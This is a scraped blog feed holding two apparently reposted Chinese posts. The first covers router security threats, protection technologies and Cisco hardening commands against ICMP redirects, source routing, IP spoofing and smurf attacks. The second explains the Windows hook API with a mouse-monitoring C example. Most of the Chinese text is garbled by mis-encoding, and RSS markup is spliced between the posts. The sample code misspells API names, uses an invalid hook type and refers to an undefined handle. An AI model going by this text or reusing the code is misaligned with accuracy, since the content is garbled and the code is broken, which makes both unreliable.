<p>銆銆璺敱鍣?Router)鏄洜鐗圭綉涓婃渶涓洪噸瑕佺殑璁懼涔嬩竴錛屾鏄亶甯冧笘鐣屽悇鍦扮殑鏁頒互涓囪鐨勮礬鐢卞櫒鏋勬垚浜嗗洜鐗圭綉榪欎釜鍦ㄦ垜浠殑韜竟鏃ュ涓嶅仠鍦拌繍杞殑宸ㄥ瀷淇℃伅緗戠粶鐨?#8220;妗ユ”銆傚湪鍥犵壒緗戜笂錛岃礬鐢卞櫒鎵紨鐫<strong>杞彂鏁版嵁鍖?/strong>“椹跨珯”鐨勮鑹詫紝瀵逛簬榛戝鏉ヨ錛屽埄鐢ㄨ礬鐢卞櫒鐨勬紡媧炲彂璧鋒敾鍑婚氬父鏄竴浠舵瘮杈冨鏄撶殑浜嬫儏錛屾敾鍑昏礬鐢卞櫒浼?strong>嫻垂CPU鍛ㄦ湡錛岃瀵間俊鎭祦閲忥紝浣跨綉緇滈櫡浜庣槴鐥?/strong>錛岄氬父濂界殑璺敱鍣ㄦ湰韜細閲囧彇涓涓ソ鐨?strong>瀹夊叏鏈哄埗</strong>鏉ヤ繚鎶よ嚜宸憋紝浣嗘槸浠呮涓鐐規槸榪滆繙涓嶅鐨勶紝淇濇姢璺敱鍣ㄥ畨鍏ㄨ繕闇瑕佺綉綆″憳鍦?strong>閰嶇疆鍜岀鐞?/strong>璺敱鍣ㄨ繃紼嬩腑閲囧彇鐩稿簲鐨勫畨鍏ㄦ帾鏂姐?/p> <p>銆銆璺敱鍣ㄦ暟鎹祦紺烘剰鍥?/p> <p>銆銆嫻佽鐨勮礬鐢卞櫒澶у鏄互紜歡璁懼鐨勫艦寮忓瓨鍦ㄧ殑錛屼絾鏄湪鏌愪簺鎯呭喌涓嬩篃鐢ㄧ▼搴忔潵瀹炵幇“杞歡璺敱鍣?#8221;錛屼袱鑰呯殑鍞竴宸埆鍙槸鎵ц鐨勬晥鐜囦笉鍚岃屽凡銆?strong>璺敱鍣ㄤ竴鑸嚦灝戝拰涓や釜緗戠粶鐩歌仈</strong>錛屽茍鏍規嵁瀹冨鎵榪炴帴緗戠粶鐨勭姸鎬佸喅瀹氭瘡涓暟鎹寘鐨勪紶杈撹礬寰勩傝礬鐢卞櫒鐢熸垚騫剁淮鎶や竴寮犵О涓?#8220;璺敱淇℃伅琛?#8221;鐨勮〃鏍鹼紝鍏朵腑璺熻釜璁板綍鐩擱偦鍏朵粬璺敱鍣ㄧ殑鍦板潃鍜岀姸鎬佷俊鎭?/p> <p>銆銆璺敱鍣ㄤ嬌鐢ㄨ礬鐢變俊鎭〃騫舵牴鎹?strong>浼犺緭璺濈</strong>鍜?strong>閫氳璐圭敤</strong>絳変紭鍖栫畻娉曟潵鍐沖畾涓涓壒瀹氱殑鏁版嵁鍖呯殑鏈浣充紶杈撹礬寰勩傛鏄繖縐嶇壒鐐瑰喅瀹氫簡璺敱鍣ㄧ殑“鏅鴻兘鎬?#8221;錛屽畠鑳藉鏍規嵁鐩擱偦緗戠粶鐨勫疄闄呰繍琛岀姸鍐佃嚜鍔ㄩ夋嫨鍜岃皟鏁存暟鎹寘鐨勪紶杈撴儏鍐碉紝灝芥渶澶х殑鍔姏浠ユ渶浼樼殑璺嚎鍜屾渶灝忕殑浠d環灝嗘暟鎹寘浼犻掑嚭鍘匯傝礬鐢卞櫒鑳藉惁瀹夊叏紼沖畾鍦拌繍琛岋紝鐩存帴褰卞搷鐫鍥犵壒緗戠殑媧誨姩錛屼笉綆″洜涓轟粈涔堝師鍥犲嚭鐜拌礬鐢卞櫒姝繪満銆佹嫆緇濇湇鍔℃垨鏄繍琛屾晥鐜囨ュ墽涓嬮檷錛屽叾緇撴灉閮藉皢鏄伨闅炬х殑銆?/p> <p>銆銆<strong>璺敱鍣ㄧ殑瀹夊叏鍓栨瀽</strong></p> <p>銆銆璺敱鍣ㄧ殑瀹夊叏鎬у垎涓ゆ柟闈紝涓鏂歸潰鏄?strong style="COLOR: red">璺敱鍣ㄦ湰韜殑瀹夊叏</strong>錛屽彟涓鏂歸潰鏄?strong style="COLOR: red">鏁版嵁鐨勫畨鍏?/strong>銆傜敱浜庤礬鐢卞櫒鏄簰鑱旂綉鐨勬牳蹇冿紝鏄綉緇滀簰榪炵殑鍏抽敭璁懼錛屾墍浠ヨ礬鐢卞櫒鐨勫畨鍏ㄨ姹傛瘮鍏朵粬璁懼鐨勫畨鍏ㄦц姹傛洿楂橈紝涓繪満鐨勫畨鍏ㄦ紡媧炴渶澶氬鑷磋涓繪満鏃犳硶璁塊棶錛岃礬鐢卞櫒鐨勫畨鍏ㄦ紡媧炲彲鑳藉鑷存暣涓綉緇滀笉鍙闂?/p> <p>銆銆璺敱鍣ㄧ殑瀹夊叏婕忔礊鍙兘瀛樺湪<strong style="COLOR: red">綆$悊</strong>涓婄殑鍘熷洜鍜?strong style="COLOR: red">鎶鏈?/strong>涓婄殑鍘熷洜銆傚湪綆$悊涓婏紝瀵硅礬鐢卞櫒<strong>鍙d護</strong>緋熺硶鐨勯夋嫨銆?strong>璺敱鍗忚鎺堟潈鏈哄埗</strong>鐨勪笉鎭板綋浣跨敤銆侀敊璇殑<strong>璺敱閰嶇疆</strong>閮藉彲鑳藉鑷磋礬鐢卞櫒宸ヤ綔鍑虹幇闂錛屾妧鏈笂璺敱鍣ㄧ殑<strong>瀹夊叏婕忔礊</strong>鍙兘鏈夋伓鎰忔敾鍑伙紝濡?strong>紿冨惉銆佹祦閲忓垎鏋愩佸亣鍐掋侀噸鍙戙佹嫆緇濇湇鍔°佽祫婧愰潪鎺堟潈璁塊棶銆佸共鎵般佺梾姣?/strong>絳夋敾鍑匯傛澶栵紝榪樻湁<strong>杞歡鎶鏈?/strong>涓婄殑婕忔礊錛岃濡?strong>鍚庨棬銆佹搷浣滅郴緇熸紡媧炪佹暟鎹簱婕忔礊銆乀CP/IP鍗忚婕忔礊銆佺綉緇滄湇鍔?/strong>絳夐兘鍙兘浼氬瓨鍦ㄦ紡媧炪?/p> <p>銆銆涓轟簡浣胯礬鐢卞櫒灝?strong>鍚堟硶淇℃伅瀹屾暣銆佸強鏃躲佸畨鍏?/strong>鍦拌漿鍙戝埌鐩殑鍦幫紝璁稿璺敱鍣ㄥ巶鍟嗗紑濮嬪湪<strong>璺敱鍣ㄤ腑娣誨姞瀹夊叏妯″潡</strong>錛屾瘮濡傚皢闃茬伀澧欍乂PN銆両DS銆侀槻鐥呮瘨銆乁RL榪囨護絳夋妧鏈紩鍏ヨ礬鐢卞櫒褰撲腑錛屼簬鏄嚭鐜頒簡璺敱鍣ㄤ笌瀹夊叏璁懼铻嶅悎鐨勮秼鍔褲備粠鏈川涓婅錛屽鍔犲畨鍏ㄦā鍧楃殑璺敱鍣紝鍦ㄨ礬鐢卞櫒鍔熻兘瀹炵幇鏂歸潰涓庢櫘閫氳礬鐢卞櫒娌℃湁鍖哄埆錛屾墍涓嶅悓鐨勬槸錛屾坊鍔犲畨鍏ㄦā鍧楃殑璺敱鍣ㄥ彲浠?strong>閫氳繃鍔犲瘑銆佽璇佺瓑鎶鏈墜孌靛寮烘姤鏂囩殑瀹夊叏鎬?/strong>錛屼笌涓撶敤瀹夊叏璁懼榪涜鏈夋晥閰嶅悎錛屾潵鎻愰珮璺敱鍣ㄦ湰韜殑瀹夊叏鎬у拰鎵綆$悊緗戞鐨勫彲鐢ㄦс?/p> <p>銆銆鑰屼負浜嗕繚鎶よ礬鐢卞櫒瀹夊叏錛屾垜浠繕蹇呴渶鑰冭檻璺敱鍣ㄧ殑閰嶇疆闂銆備竴鑸潵璇磋礬鐢卞櫒鐨勯厤緗柟寮忓彲浠ラ氳繃鐢?strong>涓繪帶Console鍙f帴緇堢</strong>閰嶇疆;鍦?strong>AUX鍙f帴Modem鍚岀數璇濈綉</strong>鐩歌繛錛屼粠鑰?strong>鍦ㄨ繙绔厤緗?/strong>;鍦?strong>TCP/IP緗戜笂鍙氳繃浠跨湡緇堢(virtual termianl)telnet閰嶇疆</strong>;鍙互浠?strong>TFTP Server涓婁笅杞介厤緗?/strong>錛屽彟澶栵紝榪樺彲浠ョ敤緗戠宸ヤ綔绔欒繘琛岄厤緗傝礬鐢卞櫒鏀誨嚮閫犳垚鐨勬渶澶у▉鑳佹槸緗戠粶鏃犳硶浣跨敤錛岃屼笖榪欑被鏀誨嚮闇瑕佸姩鐢ㄥぇ閲忛潬榪戦騫茬綉緇滅殑鏈嶅姟鍣ㄣ傚叾瀹烇紝璺敱鍣ㄦ湁涓涓搷浣滅郴緇燂紝涔熸槸涓涓蔣浠訛紝鐩稿鍏朵粬鎿嶄綔緋葷粺鐨勬妧鏈ф潵璇達紝宸窛鏄潪甯告槑鏄劇殑錛岀敱浜庡姛鑳藉崟涓錛屼笉鑰冭檻鍏煎鎬у拰鏄撶敤鎬х瓑錛屾牳蹇冨浐鍖栵紝涓鑸鐞嗗憳涓嶅厑璁歌繙紼嬬櫥褰曪紝鍔犱笂浜嗚В璺敱鍣ㄧ殑浜哄皯寰楀緢錛屾墍浠ュ畠鐨勫畨鍏ㄩ棶棰樹笉澶槑鏄撅紝鏈夋椂鍊欏伓灝斿嚭鐜版鏈虹姸鎬侊紝綆$悊鍛樹竴鑸嬌鐢╮eboot鍛戒護鍚庯紝涔熷氨娌′粈涔堥棶棰樹簡銆?/p> <p>銆銆涔熸鍥犱負榪欐牱錛岃嚧浣垮緢澶氳礬鐢卞櫒鐨勭鐞嗗憳瀵硅繖涓笉鎬庝箞鍏沖績錛屽彧瑕佺綉緇滅晠閫氬氨鍙互浜嗭紝鍥犱負璺敱鍣ㄩ氬父閮芥槸鍘傚璐熻矗緇存姢鐨勩傜敋鑷蟲湁浜涘巶瀹舵葷埍闄勫甫涓鍙ヨ:“濡傛灉蹇樿浜嗗彛浠わ紝璇峰拰緇忛攢鍟嗚仈緋匯?#8221;浜嬪疄涓婏紝榪濽nix閮芥湁寰堝婕忔礊錛屼綍鍐佃礬鐢卞櫒鑴嗗急鐨勬搷浣滅郴緇?褰撶劧璺敱鍣?strong>涓鑸槸鏃犳硶娓楀叆鐨?/strong>銆傚洜涓猴紝浣犳棤娉曡繙紼嬬櫥褰曪紝涓鑸鐞嗗憳閮戒笉浼氬紑鐨勩?strong>浣嗘槸璁╄礬鐢卞櫒鎷掔粷鏈嶅姟鐨勬紡媧炲緢澶?/strong>銆傝屼笖錛屽緢澶氱鐞嗗憳鏈変釜姣涚梾錛屼粬浠線寰瀵?a target=_blank>Windows</a>鐨勬搷浣滅郴緇熻ˉ涓佹墦寰楁瘮杈冨嫟錛屼絾鏄璺敱鍣ㄧ殑鎿嶄綔緋葷粺鐨勮ˉ涓侊紝寰堝綆$悊鍛橀兘鎳掑緱鍘葷悊銆?/p> <p>銆銆<strong>璺敱鍣ㄤ簲澶х被瀹夋帶鎶鏈?/strong></p> <p>銆銆<strong>璁塊棶鎺у埗鎶鏈?/strong>錛氱敤鎴烽獙璇佹槸瀹炵幇鐢ㄦ埛瀹夊叏闃叉姢鐨勫熀紜鎶鏈紝璺敱鍣ㄤ笂鍙互閲囩敤澶氱鐢ㄦ埛鎺ュ叆鐨勬帶鍒舵墜孌碉紝濡侾PP銆乄eb鐧誨綍璁よ瘉銆丄CL銆?02.1x鍗忚絳夛紝淇濇姢鎺ュ叆鐢ㄦ埛涓嶅彈緗戠粶鏀誨嚮錛屽悓鏃惰兘澶熼樆姝㈡帴鍏ョ敤鎴鋒敾鍑誨叾浠栫敤鎴峰拰緗戠粶銆傚熀浜嶤A鏍囧噯浣撶郴鐨勫畨鍏ㄨ璇侊紝灝嗚繘涓姝ュ姞寮鴻闂帶鍒剁殑瀹夊叏鎬с?/p> <p>銆銆<strong>浼犺緭鍔犲瘑鎶鏈?/strong>錛?strong>IPSec</strong>鏄礬鐢卞櫒甯哥敤鐨勫崗璁紝鍊熷姪璇ュ崗璁紝璺敱鍣ㄦ敮鎸?strong>寤虹珛铏氭嫙涓撶敤緗?VPN</strong>)銆侷PSec鍗忚鍖呮嫭<strong>ESP(Encapsulating Security Payload)灝佽瀹夊叏璐熻澆</strong>銆?strong>AH(Authentication Header)鎶ュご楠岃瘉鍗忚</strong>鍙奍KE錛屽瘑閽ョ鐞嗗崗璁瓑錛屽彲浠ョ敤鍦ㄥ叕鍏盜P緗戠粶涓婄‘淇濇暟鎹氫俊鐨勫彲闈犳у拰瀹屾暣鎬э紝鑳藉淇濋殰鏁版嵁<strong>瀹夊叏絀胯秺鍏綉鑰屾病鏈夎渚﹀惉</strong>銆傜敱浜嶪PSec鐨勯儴緗茬畝渚匡紝鍙渶瀹夊叏閫氶亾涓ょ鐨勮礬鐢卞櫒鎴栦富鏈烘敮鎸両PSec鍗忚鍗沖彲錛屽嚑涔庝笉闇瀵圭綉緇滅幇鏈夊熀紜璁炬柦榪涜鏇村姩錛岃繖姝f槸IPSec鍗忚鑳藉紜繚鍖呮嫭榪滅▼鐧誨綍銆佸鎴鋒満銆佹湇鍔″櫒銆佺數瀛愰偖浠躲佹枃浠朵紶杈撳強Web璁塊棶絳夊縐嶅簲鐢ㄧ▼搴忓畨鍏ㄧ殑閲嶈鍘熷洜銆?/p> <p>銆<strong>銆闃茬伀澧欓槻鎶ゆ妧鏈?/strong>錛氶噰鐢ㄩ槻鐏鍔熻兘妯″潡鐨勮礬鐢卞櫒鍏鋒湁鎶ユ枃榪囨護鍔熻兘錛岃兘澶熷鎵鏈夋帴鏀跺拰杞彂鐨勬姤鏂囪繘琛岃繃婊ゅ拰媯鏌ワ紝媯鏌ョ瓥鐣ュ彲浠ラ氳繃閰嶇疆瀹炵幇鏇存敼鍜岀鐞嗐傝礬鐢卞櫒榪樺彲浠ュ埄鐢∟AT/PAT鍔熻兘闅愯棌鍐呯綉鎷撴墤緇撴瀯錛岃繘涓姝ュ疄鐜板鏉傜殑搴旂敤緗戝叧(ALG)鍔熻兘錛岃繕鏈変竴浜涜礬鐢卞櫒鎻愪緵鍩轟簬鎶ユ枃鍐呭鐨勯槻鎶ゃ傚師鐞嗘槸褰撴姤鏂囬氳繃璺敱鍣ㄦ椂錛岄槻鐏鍔熻兘妯″潡鍙互瀵規姤鏂囦笌鎸囧畾鐨勮闂鍒欒繘琛屾瘮杈冿紝濡傛灉瑙勫垯鍏佽錛屾姤鏂囧皢鎺ュ彈媯鏌ワ紝鍚﹀垯鎶ユ枃鐩存帴琚涪寮冿紝濡傛灉璇ユ姤鏂囨槸鐢ㄤ簬鎵撳紑涓涓柊鐨勬帶鍒舵垨鏁版嵁榪炴帴錛岄槻鎶ゅ姛鑳芥ā鍧楀皢鍔ㄦ佷慨鏀規垨鍒涘緩瑙勫垯錛屽悓鏃舵洿鏂扮姸鎬佽〃浠ュ厑璁鎬笌鏂板垱寤虹殑榪炴帴鐩稿叧鐨勬姤鏂囷紝鍥炴潵鐨勬姤鏂囧彧鏈夊睘浜庝竴涓凡緇忓瓨鍦ㄧ殑鏈夋晥榪炴帴錛屾墠浼氳鍏佽閫氳繃銆?/p> <p>銆銆<strong>鍏ヤ鏡媯嫻嬫妧鏈?/strong>錛氬湪瀹夊叏鏋舵瀯涓紝鍏ヤ鏡媯嫻?IDS)鏄竴涓潪甯擱噸瑕佺殑鎶鏈紝鐩墠鏈変簺璺敱鍣ㄥ拰楂樼浜ゆ崲鏈哄凡緇忓唴緗甀DS鍔熻兘妯″潡錛屽唴緗叆渚墊嫻嬫ā鍧楅渶瑕佽礬鐢卞櫒鍏峰瀹屽杽鐨勭鍙i暅鍍?涓瀵逛竴銆佸瀵逛竴)鍜屾姤鏂囩粺璁℃敮鎸佸姛鑳姐?/p> <p>銆銆<strong>HA(楂樺彲鐢ㄦ?</strong>錛氭彁楂樿嚜韜殑瀹夊叏鎬э紝闇瑕佽礬鐢卞櫒鑳藉鏀寔澶囦喚鍗忚(濡俈RRP)鍜屽叿鏈夋棩蹇楃鐞嗗姛鑳斤紝浠ヤ嬌寰楃綉緇滄暟鎹叿澶囨洿楂樼殑鍐椾綑鎬у拰鑳藉鑾峰彇鏇村鐨勪繚闅溿?/p> <p>銆銆<strong> 鍏ヤ鏡璺敱鍣ㄧ殑鎵嬫硶鍙婂叾瀵圭瓥</strong></p> <p>銆銆閫氬父鏉ヨ錛岄粦瀹㈡敾鍑昏礬鐢卞櫒鐨勬墜孌典笌琚嚮緗戜笂鍏跺畠璁$畻鏈虹殑鎵嬫硶澶у悓灝忓紓錛屽洜涓轟粠涓ユ牸鐨勬剰涔変笂璁茶礬鐢卞櫒鏈韓灝辨槸涓鍙板叿澶囩壒孌婁嬌鍛界殑鐢佃剳錛岃櫧鐒跺畠鍙兘娌℃湁浜轟滑閫氬父鐔熻瘑鐨凱C閭f牱鐨勫瑙傘備竴鑸潵璁詫紝榛戝閽堝璺敱鍣ㄧ殑鏀誨嚮涓昏鍒嗕負浠ヤ笅涓ょ綾誨瀷錛氫竴鏄氳繃鏌愮鎵嬫鎴栭斿緞鑾峰彇綆$悊鏉冮檺錛?strong>鐩存帴渚靛叆鍒扮郴緇熺殑鍐呴儴</strong>;涓鏄噰鐢?strong>榪滅▼鏀誨嚮鐨勫姙娉曢犳垚璺敱鍣ㄥ穿婧冩鏈烘垨鏄繍琛屾晥鐜囨樉钁椾笅闄?/strong>銆傜浉杈冭岃█錛屽墠鑰呯殑闅懼害瑕佸ぇ涓浜涖?/p> <p>銆銆鍦ㄧ涓縐嶅叆渚墊柟娉曚腑錛岄粦瀹竴鑸槸鍒╃敤緋葷粺鐢ㄦ埛鐨?strong>綺楀績</strong>鎴栧凡鐭ョ殑<strong>緋葷粺緙洪櫡</strong>(渚嬪緋葷粺杞歡涓殑“鑷櫕”)鑾峰緱榪涘叆緋葷粺鐨?strong>璁塊棶鏉冮檺</strong>錛屽茍閫氳繃涓緋誨垪榪涗竴姝ョ殑琛屽姩鏈緇堣幏寰?strong>瓚呯駭綆$悊鍛樻潈闄?/strong>銆傞粦瀹竴鑸緢闅句竴寮濮嬪氨鑾峰緱鏁翠釜緋葷粺鐨勬帶鍒舵潈錛屽湪閫氬父鐨勬儏鍐典笅錛岃繖鏄竴涓?strong>閫愭笎鍗囩駭鐨勫叆渚佃繃紼?/strong>銆傜敱浜庤礬鐢卞櫒涓嶅儚涓鑸殑緋葷粺閭f牱璁炬湁浼楀鐨勭敤鎴瘋處鍙鳳紝鑰屼笖緇忓父浣跨敤瀹夊叏鎬х浉瀵硅緝楂樼殑涓撶敤杞歡緋葷粺錛屾墍浠ラ粦瀹㈣鎯寵幏鍙栬礬鐢卞櫒緋葷粺鐨勭鐞嗘潈鐩稿浜庡叆渚典竴鑸殑涓繪満灝辮鍥伴毦寰楀銆?/p> <p>銆銆鍥犳錛岀幇鏈夌殑閽堝璺敱鍣ㄧ殑榛戝鏀誨嚮澶у鏁伴兘鍙互褰掑叆絎簩綾繪敾鍑繪墜孌電殑鑼冪暣銆傝繖縐嶆敾鍑葷殑鏈緇堢洰鐨勫茍闈炵洿鎺ヤ鏡鍏ョ郴緇熷唴閮紝鑰屾槸閫氳繃鍚戠郴緇熷彂閫佹敾鍑繪ф暟鎹寘鎴栧湪涓瀹氱殑鏃墮棿闂撮殧閲岋紝鍚戠郴緇熷彂閫佹暟閲忓法澶х殑“鍨冨溇”鏁版嵁鍖咃紝浠ユ澶ч噺鑰楄垂璺敱鍣ㄧ殑緋葷粺璧勬簮錛屼嬌鍏朵笉鑳芥甯稿伐浣滐紝鐢氳嚦褰誨簳宕╂簝銆?/p> <p>銆銆璺敱鍣ㄦ槸鍐呴儴緗戠粶涓庡鐣岀殑涓涓氫俊鍑哄彛錛屽畠鍦ㄤ竴涓綉緇滀腑鍏呭綋鐫騫寵 甯﹀鍜岃漿鎹P鍦板潃鐨勪綔鐢紝瀹炵幇灝戦噺澶栭儴IP鍦板潃鏁伴噺璁╁唴閮ㄥ鍙扮數鑴戝悓鏃惰闂緗戯紝涓鏃﹂粦瀹㈡敾闄瘋礬鐢卞櫒錛岄偅涔堝氨鎺屾彙浜嗘帶鍒跺唴閮ㄧ綉緇滆闂閮ㄧ綉緇滅殑鏉冨姏錛岃屼笖濡傛灉璺敱鍣ㄨ榛戝浣跨敤鎷掔粷鏈嶅姟鏀誨嚮錛屽皢閫犳垚鍐呴儴緗戠粶涓嶈兘璁塊棶澶栫綉錛岀敋鑷抽犳垚緗戠粶鐦棯銆傚叿浣撴潵璇達紝鎴戜滑鍙互瀹炴柦涓嬮潰鐨勫絳栵細</p> <p>銆銆涓轟簡闃叉澶栭儴<strong>ICMP閲嶅畾鍚戞楠?/strong>錛屾垜浠煡閬撴敾鍑昏呮湁鏃朵細鍒╃敤ICMP閲嶅畾鍚戞潵瀵硅礬鐢卞櫒榪涜閲嶅畾鍚戯紝灝嗘湰搴旈佸埌姝g‘鐩爣鐨勪俊鎭噸瀹氬悜鍒板畠浠寚瀹氱殑璁懼錛屼粠鑰岃幏寰楁湁鐢ㄤ俊鎭傜姝㈠閮ㄧ敤鎴蜂嬌鐢↖CMP閲嶅畾鍚戠殑鍛戒護鏄細interface serial0 no ip redirects銆?/p> <p>銆銆鍦ㄩ槻姝?strong>澶栭儴婧愯礬鐢辨楠?/strong>鏃訛紝鎴戜滑鐭ラ亾婧愯礬鐢遍夋嫨鏄寚浣?strong>鐢ㄦ暟鎹摼璺眰淇℃伅鏉ヤ負鏁版嵁鎶ヨ繘琛岃礬鐢遍夋嫨</strong>銆傝鎶鏈法瓚婁簡緗戠粶灞傜殑璺敱淇℃伅錛屼嬌<strong>鍏ヤ鏡鑰呭彲浠ヤ負鍐呴儴緗戠殑鏁版嵁鎶ユ寚瀹氫竴涓潪娉曠殑璺敱</strong>錛岃繖鏍?strong>鍘熸湰搴旇閫佸埌鍚堟硶鐩殑鍦扮殑鏁版嵁鎶ュ氨浼氳閫佸埌鍏ヤ鏡鑰呮寚瀹氱殑鍦板潃</strong>銆傜姝嬌鐢ㄦ簮璺敱鐨勫懡浠わ細no ip source-route銆?/p> <p>銆銆濡備綍闃叉<strong>鐩楃敤鍐呴儴IP鍦板潃</strong>鍛?鐢變簬鏀誨嚮鑰呴氬父鍙兘浼氱洍鐢ㄥ唴閮↖P鍦板潃榪涜闈炴硶璁塊棶錛岄拡瀵硅繖涓闂錛屽彲浠ュ埄鐢–isco璺敱鍣ㄧ殑ARP鍛戒護<strong>灝嗗浐瀹欼P鍦板潃緇戝畾鍒版煇涓MAC鍦板潃</strong>涔嬩笂銆傚叿浣撳懡浠わ細arp 鍥哄畾IP鍦板潃 MAC鍦板潃 arpa銆?/p> <p>銆銆鑰岃鍦ㄦ簮绔欑偣<strong>闃叉smurf</strong>錛屽叧閿垯鏄?strong>闃繪鎵鏈夌殑鍚戝唴鍥炴樉璇鋒眰</strong>錛岃繖灝辮<strong>闃叉璺敱鍣ㄥ皢鎸囧悜緗戠粶騫挎挱鍦板潃鐨勯氫俊鏄犲皠鍒板眬鍩熺綉騫挎挱鍦板潃</strong>銆傚彲浠ュ湪LAN鎺ュ彛鏂瑰紡涓緭鍏ュ懡浠わ細no ip directed-broadcast銆?/p> <img src ="http://m.shnenglu.com/momoxiao/aggbug/103012.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://m.shnenglu.com/momoxiao/" target="_blank">灝忛粯</a> 2009-12-11 22:50 <a href="http://m.shnenglu.com/momoxiao/archive/2009/12/11/103012.html#Feedback" target="_blank" style="text-decoration:none;">鍙戣〃璇勮</a></div>]]></description></item><item><title>[zz]HOOKhttp://m.shnenglu.com/momoxiao/archive/2009/10/22/99229.html灝忛粯灝忛粯Thu, 22 Oct 2009 13:15:00 GMThttp://m.shnenglu.com/momoxiao/archive/2009/10/22/99229.htmlhttp://m.shnenglu.com/momoxiao/comments/99229.htmlhttp://m.shnenglu.com/momoxiao/archive/2009/10/22/99229.html#Feedback0http://m.shnenglu.com/momoxiao/comments/commentRss/99229.htmlhttp://m.shnenglu.com/momoxiao/services/trackbacks/99229.html閽╁瓙鍑芥暟

閽╁瓙鍑芥暟鍙互鎴幏騫跺鐞?u>鍏朵粬搴旂敤紼嬪簭鐨勬秷鎭?/span>銆傛瘡褰撶壒瀹氱殑娑堟伅鍙戝嚭錛屽湪娌℃湁鍒拌揪鐩殑紿楀彛鍓嶏紝閽╁瓙紼嬪簭灝卞厛鎹曡幏璇ユ秷鎭紝浜﹀嵆閽╁瓙鍑芥暟鍏堝緱鍒版帶鍒舵潈銆傝繖鏃墮挬瀛愬嚱鏁板嵆鍙互鍔犲伐澶勭悊錛堟敼鍙橈級璇ユ秷鎭紝涔熷彲浠ヤ笉浣滃鐞嗚岀戶緇紶閫掕娑堟伅錛岃繕鍙互寮哄埗緇撴潫娑堟伅鐨勪紶閫掋?br>閽╁瓙鐨勭綾誨緢澶氾紝姣忕閽╁瓙鍙互鎴幏騫跺鐞嗙浉搴旂殑娑堟伅錛屽閿洏閽╁瓙鍙互鎴幏閿洏娑堟伅錛屽澹抽挬瀛愬彲浠ユ埅鍙栥佸惎鍔ㄥ拰鍏抽棴搴旂敤紼嬪簭鐨勬秷鎭瓑
鍏充簬HOOK
Hooks
A hook is a point in the system message-handling mechanism where an application can install a subroutine to monitor the message traffic in the system and process certain types of messages before they reach the target window procedure.

瀹夎涓涓狧OOK錛孲etWindowsHookEx
瀵規瘡縐嶇被鍨嬬殑閽╁瓙鐢?span style="background-color: #c0c0c0;">緋葷粺鏉ョ淮鎶や竴涓挬瀛愰摼錛屾渶榪戝畨瑁呯殑閽╁瓙鏀懼湪閾劇殑寮濮嬶紝鑰屾渶鍏堝畨瑁呯殑閽╁瓙鏀懼湪鏈鍚庯紝涔熷氨鏄?span style="background-color: #c0c0c0;">鍚庡姞鍏ョ殑鍏堣幏寰楁帶鍒舵潈銆?br>The SetWindowsHookEx function installs an application-defined hook procedure into a hook chain. You would install a hook procedure to monitor the system for certain types of events. These events are associated either with a specific thread or with all threads in the same desktop as the calling thread.
HHOOK SetWindowsHookEx(
int idHook,        // hook type.璇鋒煡鐪婱SDN鑾峰緱璇︾粏淇℃伅
HOOKPROC lpfn,     // hook procedure
HINSTANCE hMod,    // handle to application instance
DWORD dwThreadId   // thread identifier
);

寰楀埌鎺у埗鏉冪殑閽╁瓙鍑芥暟鍦ㄥ畬鎴愬娑堟伅鐨勫鐞嗗悗錛屽鏋滄兂瑕佽娑堟伅緇х畫浼犻掞紝閭d箞瀹冨繀欏昏皟鐢ㄥ彟澶栦竴涓猄DK涓殑API鍑芥暟CallNextHookEx鏉ヤ紶閫掑畠銆?br>(瀵逛竴涓簨浠跺鐞嗙殑hook鍙兘鏈夊涓紝瀹冧滑鎴愰摼鐘訛紝浣跨敤CallNextHookEx涓綰т竴綰у湴璋冪敤銆傜畝鍗曡В閲婅繃鏉ュ氨鏄?#8220;璋冪敤涓嬩竴涓狧OOK” )
CallNextHookEx
The CallNextHookEx function passes the hook information to the next hook procedure in the current hook chain. A hook procedure can call this function either before or after processing the hook information.
LRESULT CallNextHookEx(
HHOOK hhk,      // handle to current hook
int nCode,      // hook code passed to hook procedure
WPARAM wParam, // value passed to hook procedure
LPARAM lParam   // value passed to hook procedure
);

hook澶勭悊鍑芥暟
LRESULT CALLBACK HookProc(
int nCode,
WPARAM wParam,
LPARAM lParam
);

鍙栨秷HOOK
UnhookWindowsHookEx
The UnhookWindowsHookEx function removes a hook procedure installed in a hook chain by the SetWindowsHookEx function.
BOOL UnhookWindowsHookEx(
HHOOK hhk   // handle to hook procedure
);

 

紺轟緥錛?br>[code]
// 鐩戣榧犳爣娑堟伅
// hook澶勭悊鍑芥暟澹版槑
LRESULT CALLBACK MyMouseProc(int nCode, WPARAM wParam, LPARAM lParam);
static BOOL StartWatchingMouse(); // 寮濮嬬洃瑙?br>static void StopWatchingMouse();    // 緇撴潫
static HHOOK hHook = NULL;    //hook鎸囬拡
/*======================================================
*Function:StartWatchingMouse()
*Author:wuhuiran 05-7-23
*Desc:寮濮嬬洃瑙嗛紶鏍?br>*Record:
--------------------------------------------------------
========================================================*/
BOOL StartWatchingMouse()
{
hHook = SetWindowHookEx(WM_MOUSE, (HOOKPROC) MyMouseProc,
   (HINSTANCE) NULL, GetCurrentThreadId());
  
if(!hHook)
{
   return FALSE;
}

return TRUE;

}

/*======================================================
*Function:StartWatchingMouse()
*Author:wuhuiran 05-7-23
*Desc:鍙栨秷鐩戣榧犳爣
*Record:
--------------------------------------------------------
========================================================*/
void StopWatchingMouse()
{
if(hHook)
{
   UnHookWindowHookEx(hHook);
   hHook = NULL;
}
}

/*======================================================
*Function:StartWatchingMouse()
*Author:wuhuiran 05-7-23
*Desc:HOOK澶勭悊鍑芥暟
*Record:
--------------------------------------------------------
========================================================*/
LRESULT CALLBACK MyMouseProc(int nCode, WPARAM wParam, LPARAM lParam)
{
if(nCode < 0)
{
   return CallNextHookEx(hHook, nCode, wParam, lParam);
  
}

MOUSEHOOKSTRUCT *pMouseHookStruct;   //榧犳爣HOOK緇撴瀯浣?br>pMouseHookStruct = (MOUSEHOOKSTRUCT *)lParam;

POINT pt = pMouseHookStruct->pt;
//鍔ㄤ竴涓嬮紶鏍囧氨浼氭樉紺洪紶鏍囦綅緗?br>CString strMsg;
strMsg.Format("x:\t%d\ny:\t%d", pt.x, pt.y);
AfxMessageBox(strMsg);

return CallNextHookEx(myHook, nCode, wParam, lParam);
}
[/code]

娉ㄦ剰錛?br>hook浼氫嬌緋葷粺鍙樻參錛岄櫎闈炲繀瑕侊紝涓嶈棰戠箒浣跨敤銆傚湪涓嶄嬌鐢ㄧ殑鏃跺欏敖蹇垹闄?br>鍏ㄥ眬閽╁瓙蹇呴』鏀懼湪DLL涓?/p>

